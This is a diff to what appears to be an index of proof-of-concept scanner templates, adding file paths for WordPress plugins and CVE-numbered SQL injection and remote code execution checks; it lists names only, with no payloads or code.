@@ -75619,9 +75732,11 @@ ./poc/other/indeed-membership-pro-ab485d9a6d288626aae7e73e1ed249d0.yaml ./poc/other/indeed-membership-pro-af19c70bbc3d03b63f972ccb6af47984.yaml ./poc/other/indeed-membership-pro-b0a56eadad3039f40c1e65bbd12111c4.yaml +./poc/other/indeed-membership-pro-d0036f529101dc1ba27ca21f4e21299b.yaml ./poc/other/indeed-membership-pro-d37c0187be48f6315a0b8912f2a110d6.yaml ./poc/other/indeed-membership-pro-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/indeed-membership-pro-e3649b3103c03fdfd2721c6009fbc8cd.yaml +./poc/other/indeed-membership-pro-ee7f04a1728a71ff455331ff4a5e274a.yaml ./poc/other/indeed-membership-pro-f98376cb2d870374e021e1e6add4ec0c.yaml ./poc/other/indeed-membership-pro-fd95aa74f1e4a3f0ca466f92f001062c.yaml ./poc/other/indeed-membership-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -75952,6 +76067,7 @@ ./poc/other/invitation-code-content-access-4aafe7d4acbe65841e2042718ad9bb06.yaml ./poc/other/invitation-code-content-access.yaml ./poc/other/invite-anyone-08b92f6ed0c77582a2df5e0118f3236b.yaml +./poc/other/invite-anyone-7272ae1b7b7b371ddf8592123a11b2b2.yaml ./poc/other/invite-anyone-7a771f69129cee8150df8e368d05c8a3.yaml ./poc/other/invite-anyone-a3855c7df99c9089e4b9bc829589503f.yaml ./poc/other/invite-anyone-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -77229,6 +77345,7 @@ ./poc/other/learn-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/learn-manager-plugin.yaml ./poc/other/learn-manager.yaml +./poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml ./poc/other/learning-management-system-6c0e04cbc2da4388f81a8caa6d6b8191.yaml ./poc/other/learning-management-system-7c31e6671c937327ff1564eccbf43be8.yaml ./poc/other/learning-management-system-d39d6c1f84e5236c7d49d1e68072221d.yaml 
@@ -78664,6 +78781,7 @@ ./poc/other/mediavine-control-panel-c635bfd174639f61c365b808c8ca4593.yaml ./poc/other/mediavine-control-panel.yaml ./poc/other/mediavine-create-35e98f5a974573af01f65035bbe38912.yaml +./poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml ./poc/other/mediavine-create-fa32f81d47f0482b51953006aebf3aa1.yaml ./poc/other/mediavine-create.yaml ./poc/other/medibazar-9dfdafdab71caf1c953586be77677f3e.yaml @@ -79244,6 +79362,7 @@ ./poc/other/modal-window-608e913de73744ebb0ca00e95ef5d993.yaml ./poc/other/modal-window-918bfee3366f29426807ea0f4ccd9036.yaml ./poc/other/modal-window-b4297a97da0c3ffb6b4810113c1e1d81.yaml +./poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml ./poc/other/modal-window.yaml ./poc/other/modal_survey-2daa2b2b5e101afb9d69636e32f88c70.yaml ./poc/other/modal_survey-34b457eeb84c933881032142c45484d8.yaml @@ -79711,6 +79830,7 @@ ./poc/other/mybb-forum-install.yaml ./poc/other/mybb.yaml ./poc/other/myblogu.yaml +./poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml ./poc/other/mybooktable-50a0b0e273ccd0ef710f5b593260e684.yaml ./poc/other/mybooktable-5a2111311b69937a869fb11135af3fa1.yaml ./poc/other/mybooktable-70828a884c226a608e2e7d2f5baaea57.yaml @@ -80961,6 +81081,7 @@ ./poc/other/orangehrm-installer.yaml ./poc/other/orangehrm.yaml ./poc/other/orangescrum-install.yaml +./poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml ./poc/other/orbisius-child-theme-creator-4b510f2cf596091cd1255e3e65f8c9ac.yaml ./poc/other/orbisius-child-theme-creator-a28a3d5449e1b7d7ce99381c441dff20.yaml ./poc/other/orbisius-child-theme-creator.yaml 
@@ -81123,6 +81244,7 @@ ./poc/other/pacs-connexion-utilisateur.yaml ./poc/other/page-and-post-restriction-bb6761a5115838d81d6e251362c2868d.yaml ./poc/other/page-and-post-restriction.yaml +./poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml ./poc/other/page-builder-add-6646984be2a8266aaf9306caac9ad1d3.yaml ./poc/other/page-builder-add-8985f563f4f151ac79c51c95fa9f19b0.yaml ./poc/other/page-builder-add-99cdfaebe5c090667cc6d5f44256a1d0.yaml @@ -81893,6 +82015,7 @@ ./poc/other/pinterest.yaml ./poc/other/pintrest-phish.yaml ./poc/other/piotnet-addons-for-elementor-1f46109352a954ec8f136bcbc5fe8ad7.yaml +./poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml ./poc/other/piotnet-addons-for-elementor-b20295143018b856494f75c508820e5f.yaml ./poc/other/piotnet-addons-for-elementor-b5b7fc63b6c4a91856192ed2320da581.yaml ./poc/other/piotnet-addons-for-elementor-cfb215fb0afbf53ed07cc44d5a98cfe3.yaml @@ -83123,6 +83246,7 @@ ./poc/other/propertyhive-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/propertyhive-plugin.yaml ./poc/other/propertyhive.yaml +./poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml ./poc/other/propovoice-fec98ad857d532565cf2b8daac541c01.yaml ./poc/other/propovoice.yaml ./poc/other/proquoter-d307dfdaf331e3b386f7078b98a1c2c8.yaml @@ -83225,6 +83349,7 @@ ./poc/other/pure-chat-df530c7666ae8fd104d667c14e462955.yaml ./poc/other/pure-chat.yaml ./poc/other/puridiom.yaml +./poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml ./poc/other/purosa-b49dafa9501f406e94b1c544d3cb4ee0.yaml ./poc/other/purosa.yaml ./poc/other/purus-76c6b84ccd9f6bd60eada03675ff7bce.yaml 
@@ -84241,6 +84366,7 @@ ./poc/other/responsive-add-ons-plugin.yaml ./poc/other/responsive-add-ons.yaml ./poc/other/responsive-b35acf8634721bd8b2254b89aad90bd4.yaml +./poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml ./poc/other/responsive-c567878f616fa78cef0a6bc18a4ad518.yaml ./poc/other/responsive-category-slider.yaml ./poc/other/responsive-column-widgets-10174a5bcac9bad47e8550b3d07ca19d.yaml @@ -84971,6 +85097,7 @@ ./poc/other/salon-booking-system-4ea6d28e68bcbf5d357dc84d7792878d.yaml ./poc/other/salon-booking-system-525a2553e2958053e41ef8fef4652482.yaml ./poc/other/salon-booking-system-55186e56046e33e0cca9c47f9f3d9e22.yaml +./poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml ./poc/other/salon-booking-system-6fd64ddfb4c95625a5a0801ecf3eac31.yaml ./poc/other/salon-booking-system-7207ea24e0d58e9f42d09a61466f74dc.yaml ./poc/other/salon-booking-system-721a66b7e80a6749fcd912a2dd813cbe.yaml @@ -87593,6 +87720,7 @@ ./poc/other/store-locator-d4a60c9fc5cffc80560c943955e1ab15.yaml ./poc/other/store-locator-dd482f074d477676aa8777900bb798c3.yaml ./poc/other/store-locator-le-1283ee32d4f50f1e49de2f7b5adec7a7.yaml +./poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml ./poc/other/store-locator-le-a91e0c069a35e1bc88978709b855d6dd.yaml ./poc/other/store-locator-le-b8e7cb24bf7c744f84f9fc54eed7b8aa.yaml ./poc/other/store-locator-le-cc8f62949d87a65c3d86f5a8c42aa4e6.yaml @@ -87709,6 +87837,7 @@ ./poc/other/structured-content-221291df1a9cc1f7833e5dce6cff0b77.yaml ./poc/other/structured-content-79949280778ecf47288898565d146f26.yaml ./poc/other/structured-content-80bdfd3e2031392260ba3a35a2af56b7.yaml +./poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml ./poc/other/structured-content.yaml ./poc/other/structurizr-panel.yaml ./poc/other/studiozen-16958f969761610f7adf36067afa2d81.yaml 
@@ -88313,6 +88442,7 @@ ./poc/other/teachpress.yaml ./poc/other/team-0fa973a5c2b71f4a5be9030b88186095.yaml ./poc/other/team-206abb9b15870411c833af9aa0f93f3b.yaml +./poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml ./poc/other/team-ac3c833ad815af1432a607ddd70e6c4e.yaml ./poc/other/team-board.yaml ./poc/other/team-f38f21f2e660a6510599ad0cfa5238c3.yaml @@ -89440,6 +89570,7 @@ ./poc/other/tutor-6c03efd47f65b6074ccc9ee2526f1292.yaml ./poc/other/tutor-71c5ddae6a81b95766888afa1d1c01c3.yaml ./poc/other/tutor-7295d11162814fb0ba1c6d580570a210.yaml +./poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml ./poc/other/tutor-7ea8c00918b2b7a0dd4f6b321b5ef053.yaml ./poc/other/tutor-7f430702e5f2f8d47d2f5aa211b77b70.yaml ./poc/other/tutor-97a3d5e265108ef50d642d0296d79c3b.yaml @@ -89919,6 +90050,7 @@ ./poc/other/ultimate-reviews-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/ultimate-reviews-e4710dde34171f45446a0fc70c5bc516.yaml ./poc/other/ultimate-reviews.yaml +./poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml ./poc/other/ultimate-store-kit-a642a01295abf57e7ebc62409ec7af27.yaml ./poc/other/ultimate-store-kit-e2efcb1d97a97f985d85c8b996d104ab.yaml ./poc/other/ultimate-store-kit.yaml @@ -90913,6 +91045,7 @@ ./poc/other/visnesscard.yaml ./poc/other/vistered-little-bb15fc0afbd39462bbb4450087669bb5.yaml ./poc/other/vistered-little.yaml +./poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml ./poc/other/visual-form-builder-355778cd9ce14bd4396f412f1952e5bb.yaml ./poc/other/visual-form-builder-5e4ed275d9505a830c27353ad55f8a35.yaml ./poc/other/visual-form-builder-72503cf643bf257391bc9aa733939b75.yaml 
@@ -91515,6 +91648,7 @@ ./poc/other/wellcare-health-management-system.yaml ./poc/other/wemail-307c045ce407a6d8e70ca844a5900ee8.yaml ./poc/other/wemail-55347e9ac58126992d50d45693e54288.yaml +./poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml ./poc/other/wemail-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/other/wemail-ebaa67c580f393a8a3d2ab9cc65cf0ac.yaml ./poc/other/wemail.yaml @@ -91577,6 +91711,8 @@ ./poc/other/whmcs-bridge-8483c41059b1a8e448d35ba9865eee4d.yaml ./poc/other/whmcs-bridge.yaml ./poc/other/whmcs.yaml +./poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml +./poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml ./poc/other/who-hit-the-page-hit-counter-89883786f75e8dc84847064827029c37.yaml ./poc/other/who-hit-the-page-hit-counter-a1e508b6aa56ac41251dd289b91ee3dd.yaml ./poc/other/who-hit-the-page-hit-counter-a8aa7e6da9021bb8e7c5234d4deec357.yaml @@ -92147,6 +92283,7 @@ ./poc/other/woo-product-variation-gallery.yaml ./poc/other/woo-product-variation-swatches-a2f872a236d04ab5253c686b42cdd622.yaml ./poc/other/woo-product-variation-swatches.yaml +./poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml ./poc/other/woo-products-widgets-for-elementor-42185b875105a7f60d9e9dab75c7a958.yaml ./poc/other/woo-products-widgets-for-elementor-899c764ee1e1018364a0620ec38aa86d.yaml ./poc/other/woo-products-widgets-for-elementor.yaml @@ -93184,6 +93321,7 @@ ./poc/other/zephyr-project-manager-22340cb944c0e6f8c82963bd053d9524.yaml ./poc/other/zephyr-project-manager-281bf1419f5dfa8b5e2c3047ef4d04b2.yaml ./poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml +./poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml ./poc/other/zephyr-project-manager-85e7c465d69b6dda44532e33fc83909c.yaml ./poc/other/zephyr-project-manager-87ce4b87af0b3ebc185689714b157b24.yaml ./poc/other/zephyr-project-manager-8ba2c39394e29aba6053c8c245fd4e4f.yaml 
@@ -95022,6 +95160,7 @@ ./poc/remote_code_execution/enhanced-e-commerce-for-woocommerce-store.yaml ./poc/remote_code_execution/enquiry-quotation-for-woocommerce-a7fdc5e1592a2afb36d817361aee6e46.yaml ./poc/remote_code_execution/enquiry-quotation-for-woocommerce.yaml +./poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml ./poc/remote_code_execution/envo-elementor-for-woocommerce-6ef08399a8d4914f769bd3119ca6cdfa.yaml ./poc/remote_code_execution/envo-elementor-for-woocommerce-afd2dc65a8882f6640770f804f5e6346.yaml ./poc/remote_code_execution/envo-elementor-for-woocommerce-befe5bd2f4e2538c3bfd66b63bd45b64.yaml @@ -95612,6 +95751,7 @@ ./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin.yaml ./poc/remote_code_execution/order-delivery-date-for-woocommerce.yaml +./poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-deb2f706b61560f21bb9bc439367e4c9.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-fd8db3c088a1878860378bbefce894e8.yaml @@ -96567,6 +96707,7 @@ ./poc/remote_code_execution/woocommerce-abandoned-cart-pro-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-abandoned-cart-pro.yaml ./poc/remote_code_execution/woocommerce-abandoned-cart.yaml +./poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml ./poc/remote_code_execution/woocommerce-aca3807d00a87f905398f905ab21abbe.yaml ./poc/remote_code_execution/woocommerce-ad248c92593e9313c82d40a87bbf306c.yaml ./poc/remote_code_execution/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml 
@@ -98355,6 +98496,7 @@ ./poc/search/wp-custom-fields-search.yaml ./poc/search/wp-extended-search-d8fbdd78783ed9fee39d4591d264abf7.yaml ./poc/search/wp-extended-search.yaml +./poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml ./poc/search/wp-jobsearch-0964abf3a2489fe0875449d31d844760.yaml ./poc/search/wp-jobsearch-09acb8c3e4b49f60dcdc9014584ef5ad.yaml ./poc/search/wp-jobsearch-0deb25d5fcf2be67833c2b15c50bc0a1.yaml @@ -101418,6 +101560,7 @@ ./poc/sql/CVE-2024-3813-fd8332d82db1e16b4fc3acea6f70b7f5.yaml ./poc/sql/CVE-2024-38671-cc011c6652e6bb4e9856964db8a794f2.yaml ./poc/sql/CVE-2024-38673-497a27b08c38d02abbc2917aefcdbaf2.yaml +./poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml ./poc/sql/CVE-2024-38678-264072720f6db401dc8ab66f48c30963.yaml ./poc/sql/CVE-2024-38691-fd15e4dd009993f021ad220fc706dbe2.yaml ./poc/sql/CVE-2024-38693-0072f6073736ce2db6bf5f2612a21d20.yaml 
@@ -101470,10 +101613,22 @@ ./poc/sql/CVE-2024-43149-48bd2fb7dfa7c0ba66333db47a7aa078.yaml ./poc/sql/CVE-2024-43230-9e8adb139a0d7ed623bea89f5702e850.yaml ./poc/sql/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml +./poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml +./poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml +./poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml +./poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml +./poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml +./poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml +./poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml +./poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml +./poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml ./poc/sql/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml ./poc/sql/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml ./poc/sql/CVE-2024-43301-e70a166216c8c165db0d83860ef1272c.yaml +./poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml ./poc/sql/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml +./poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml +./poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml ./poc/sql/CVE-2024-4344-c795caf4db9f9f708810052f2a459981.yaml ./poc/sql/CVE-2024-4346-3eb448297924902e8da132dbf247a5c3.yaml ./poc/sql/CVE-2024-4347-058d731900c2db8ba3484ed32650ada1.yaml @@ -101588,6 +101743,7 @@ ./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml ./poc/sql/CVE-2024-7092-4edc2efb8d8dec4f4786c242db407100.yaml ./poc/sql/CVE-2024-7145-4e8d81a353841cdd435dbb6eddfecc6d.yaml +./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml ./poc/sql/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml ./poc/sql/CVE-2024-7302-b9e037a9c7ecf1544ad73a0b3afdbb7d.yaml ./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml 
@@ -102585,6 +102741,7 @@ ./poc/sql/complianz-gdpr-47631567152b7ae9db654f97578c32bd.yaml ./poc/sql/complianz-gdpr-57c6888ced10b936db3b5ad6f04d5907.yaml ./poc/sql/complianz-gdpr-dba1ff9fb5baa97496a228b9524e2848.yaml +./poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml ./poc/sql/conditional-menus-c1c870bdb34dcd5f0929b33c1544b025.yaml ./poc/sql/coneblog-widgets-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/configurable-tag-cloud-widget-ca276d47d9ec19544f581dbe03805651.yaml @@ -103667,6 +103824,7 @@ ./poc/sql/hooked-editable-content-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/horizontal-scrolling-announcement-2e09c7979ecd80207aa4140ca81db946.yaml ./poc/sql/hostel-14d486bd9a23dbb508df7de81fc903b5.yaml +./poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml ./poc/sql/houzez-crm-3ca1b066cb1415aacdb3198d062d0872.yaml ./poc/sql/houzez-login-register-bb43e7e2104f92ffb17608db5afe8e6a.yaml ./poc/sql/hqtheme-extra-6477bf18cad6c823db485408d49b337b.yaml @@ -103678,6 +103836,7 @@ ./poc/sql/html5-maps-09431ac7051652adb8e4fb2e66a5b8db.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist-8184d8d92561017974e3799804b8964f.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist.yaml +./poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml ./poc/sql/huatian-oa-sqli.yaml ./poc/sql/huatian-oa-workFlowService-sqli.yaml ./poc/sql/hub2word-19da068002cca60260bcb7db1e405192.yaml @@ -104254,6 +104413,7 @@ ./poc/sql/new-video-gallery-9352db8e65ccbade06069fb091692d87.yaml ./poc/sql/news-wall-a4b8ad9f0076a0ef1baa7dbdb2b571b6.yaml ./poc/sql/newsletter-by-supsystic-466dcf8e4e9a002d112948258edb5d41.yaml +./poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml ./poc/sql/newsmag-cdb01ef22f4b446312ace084de576ddb.yaml ./poc/sql/newspaper-a89f41cc43cdb51913109cc90cee59b5.yaml ./poc/sql/newspaper-lite-65373f34e6552a5b8edb7c5dd6a66e65.yaml 
@@ -105495,6 +105655,7 @@ ./poc/sql/ultimate-addons-for-beaver-builder-34db2e68002bdcff6df9cc2b0342a97b.yaml ./poc/sql/ultimate-addons-for-beaver-builder-lite-db7ccd53f2144783cf49bfe0f1b97f4c.yaml ./poc/sql/ultimate-addons-for-contact-form-7-5ed2db34684463722f6aeee2145b6b0a.yaml +./poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml ./poc/sql/ultimate-addons-for-gutenberg-065ff4b220c4adbae27e68e9a535def4.yaml ./poc/sql/ultimate-addons-for-gutenberg-134fe25d3afd0b58ebfd082519f2dbc6.yaml ./poc/sql/ultimate-addons-for-gutenberg-a7f33f5aa50a3dbe653e586fdada87c9.yaml @@ -105642,6 +105803,7 @@ ./poc/sql/vm-backups-12b774c15753bb5db557b2a48b74ffd4.yaml ./poc/sql/vm-backups-f2e7c5b0dbc2075489d2b8e2144f3c4b.yaml ./poc/sql/vo-locator-the-wp-store-locator-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml ./poc/sql/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/sql/vslider-0be0a4f63adb92ae4208f6a727d13b8b.yaml ./poc/sql/vslider-e1bdb30b8c1c06b5ace271f8d6ebaff0.yaml @@ -106442,6 +106604,7 @@ ./poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml ./poc/sql/wpforms-lite-66ca6dbf7e54d3f9d0cc66ebad78a311.yaml ./poc/sql/wpforo-04b9b42183fab163d0ecfec567eac5db.yaml +./poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml ./poc/sql/wpforo-eeecbea748b4788b1e8348663a9cddb1.yaml ./poc/sql/wpfront-notification-bar-57b2f88e0b70c7c74d9ac4dbdb8b5471.yaml ./poc/sql/wpgsi-6477bf18cad6c823db485408d49b337b.yaml 
@@ -111159,6 +111322,8 @@ ./poc/wordpress/lean-wp-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/lean-wp-plugin.yaml ./poc/wordpress/lean-wp.yaml +./poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml +./poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml ./poc/wordpress/lim4wp-6355cc5298b74aae91fbc3add72431cc.yaml ./poc/wordpress/lim4wp-85c0c2a57191d8f1425d9f6b31a4f872.yaml ./poc/wordpress/lim4wp-bdfc359e3288238435c76be20d0c749a.yaml @@ -113011,6 +113176,7 @@ ./poc/wordpress/wp-analytify-307a5a12c92c01b389dc7c1f52b86aae.yaml ./poc/wordpress/wp-analytify-329ec47c91ef1d46bafc7ee456d12278.yaml ./poc/wordpress/wp-analytify-46508e119f7d54bc836c0dcdbec0cd5d.yaml +./poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml ./poc/wordpress/wp-analytify-6c86fdf8dce22ef2f51c32ba6445a1b9.yaml ./poc/wordpress/wp-analytify-88d65847c7b6798961eec6de24dcf89b.yaml ./poc/wordpress/wp-analytify-8bab483e91c9562c4a46ba23e2da55b3.yaml @@ -113132,10 +113298,13 @@ ./poc/wordpress/wp-backgrounds-lite.yaml ./poc/wordpress/wp-backitup-4465d9b33aea3fb4f708ca44e3512de4.yaml ./poc/wordpress/wp-backitup-45e44c833a725a83e13f239184d655f0.yaml +./poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml ./poc/wordpress/wp-backitup-81a6fae0a36ba854bcee37c800e3c80e.yaml ./poc/wordpress/wp-backitup-8c8afa4d6c717d48d150ea8ee844a666.yaml ./poc/wordpress/wp-backitup-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml ./poc/wordpress/wp-backitup-f83c70e3caa4f751a4286ba45e2a1ca7.yaml +./poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml ./poc/wordpress/wp-backitup-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-backitup-plugin.yaml ./poc/wordpress/wp-backitup.yaml 
@@ -114198,6 +114367,7 @@ ./poc/wordpress/wp-file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-file-manager-plugin.yaml ./poc/wordpress/wp-file-manager-pro-496430aebc118064e7ec23d62d986787.yaml +./poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml ./poc/wordpress/wp-file-manager-pro-e692c282371b8d1b4dcb26c52c89e7cd.yaml ./poc/wordpress/wp-file-manager-pro-fea69044b80e2364d98228b5dbe70fe5.yaml ./poc/wordpress/wp-file-manager-pro.yaml @@ -114748,6 +114918,7 @@ ./poc/wordpress/wp-job-portal-3ed29051521d7b123afa881d9f582a09.yaml ./poc/wordpress/wp-job-portal-6991636be674dec0e6ae129f466cf764.yaml ./poc/wordpress/wp-job-portal-715d52378457a7ac370cc45a9dc1e067.yaml +./poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml ./poc/wordpress/wp-job-portal-a5bdc2b0068a1c535dc51453d211dcd6.yaml ./poc/wordpress/wp-job-portal-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-job-portal-d51f4fd87b69ac765648da293bd32a31.yaml @@ -114761,6 +114932,7 @@ ./poc/wordpress/wp-jobs-60dedaec1dd5894ea2c041f7a03c3f01.yaml ./poc/wordpress/wp-jobs-fa1f4667d5ac84642e2aab4facec62ac.yaml ./poc/wordpress/wp-jobs.yaml +./poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml ./poc/wordpress/wp-jobsearch-0964abf3a2489fe0875449d31d844760.yaml ./poc/wordpress/wp-jobsearch-09acb8c3e4b49f60dcdc9014584ef5ad.yaml ./poc/wordpress/wp-jobsearch-0deb25d5fcf2be67833c2b15c50bc0a1.yaml @@ -114917,6 +115089,7 @@ ./poc/wordpress/wp-lister-for-amazon.yaml ./poc/wordpress/wp-lister-for-ebay-2797702b855bbd02310eb576c4e2b739.yaml ./poc/wordpress/wp-lister-for-ebay-2fcccfd74cb4a5df1bc99522367e4fea.yaml +./poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml ./poc/wordpress/wp-lister-for-ebay-9a24f509c2fa764beb4fea7de561b115.yaml ./poc/wordpress/wp-lister-for-ebay.yaml ./poc/wordpress/wp-listings-0c160c0f03550008756b1f68b960b59c.yaml 
@@ -115718,6 +115891,8 @@ ./poc/wordpress/wp-pro-quiz-ad46cba696b2795a7f99c34b1c5adcb7.yaml ./poc/wordpress/wp-pro-quiz.yaml ./poc/wordpress/wp-product-feed-manager-1366b5506eb3697685f97d307ede6558.yaml +./poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml +./poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml ./poc/wordpress/wp-product-feed-manager-ffd7cfdedd3289922f8c39667b26424c.yaml ./poc/wordpress/wp-product-feed-manager.yaml ./poc/wordpress/wp-product-review-1a23fd7aed28f7e3e99029e2466cc057.yaml @@ -116749,6 +116924,7 @@ ./poc/wordpress/wp-translitera.yaml ./poc/wordpress/wp-travel-71620b005bcbf2aee9f61b11bd4c7a65.yaml ./poc/wordpress/wp-travel-a5c7da051e57e878aa92aaa58a089e18.yaml +./poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml ./poc/wordpress/wp-travel-engine-5dbbaad444b84209703eb55cd167d8a5.yaml ./poc/wordpress/wp-travel-engine-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-travel-engine-95a033691d3f2bc9fa850c217ca94e96.yaml @@ -117463,8 +117639,10 @@ ./poc/wordpress/wpforo-15704f1e6f9ac4aef25e7f970e62d77c.yaml ./poc/wordpress/wpforo-1d51b22e96a973d76e6cd2a2b23973bf.yaml ./poc/wordpress/wpforo-1e1cee395da2709f43055d35dac994e6.yaml +./poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml ./poc/wordpress/wpforo-4ee11858ba054f1b65dc6f58388e221b.yaml ./poc/wordpress/wpforo-527c1cbc14f273847e06d2147bbd6bac.yaml +./poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml ./poc/wordpress/wpforo-68370149b2ad708b657f9f7eff464149.yaml ./poc/wordpress/wpforo-9825e89e13b9f57246a3f81b72a27574.yaml ./poc/wordpress/wpforo-a24f48ab001f516ee4a4783f2bcaf0ea.yaml 
